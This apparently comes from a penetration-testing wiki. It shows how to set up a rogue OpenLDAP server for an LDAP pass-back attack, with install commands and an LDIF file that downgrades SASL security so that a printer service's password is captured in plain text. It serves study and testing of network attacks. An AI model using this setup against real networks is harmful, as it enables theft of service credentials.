Rogue LDAP Server

sudo apt install slapd ldap-utils
sudo systemctl enable slapd
sudo dpkg-reconfigure -p low slapd

  • Omit initial configuration?: No

  • DNS domain name: target domain

  • Organization name: target domain

  • Administrator password: anything, but remember it

  • Database removed?: No

  • Move old database?: Yes

Backing up /etc/ldap/slapd.d in /var/backups/slapd-2.5.18+dfsg-3... done.
Moving old database directory to /var/backups
Creating initial configuration... done.
Creating LDAP directory... done.

Before using the rogue LDAP server, we need to make it vulnerable by downgrading the supported authentication mechanisms. We want to ensure that our LDAP server only supports PLAIN and LOGIN authentication methods. To do this, we need to create a new ldif file, called with the following content:

cat ./olcSaslSecProps.ldif
#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

  • olcSaslSecProps: Specifies the SASL security properties

  • noanonymous: Disables mechanisms that support anonymous login

  • minssf: Specifies the minimum acceptable security strength with 0, meaning no protection.

LogoNetIQ Documentation: Guía de resolución de problemas de eDirectory 8.8 SP8 de NetIQ - Descripción de LDIFwww.netiq.com

Update configuration

Verify configuration

We have our LDAP server running under the 389 port.

Capturing LDAP Credentials

And we are able to retrieve the plain text password used for the Printer Service against LDAP.

PreviousLDAP Pass-backNextSMB Relay (LLNMR, NTB-NS & WPAD)

Last updated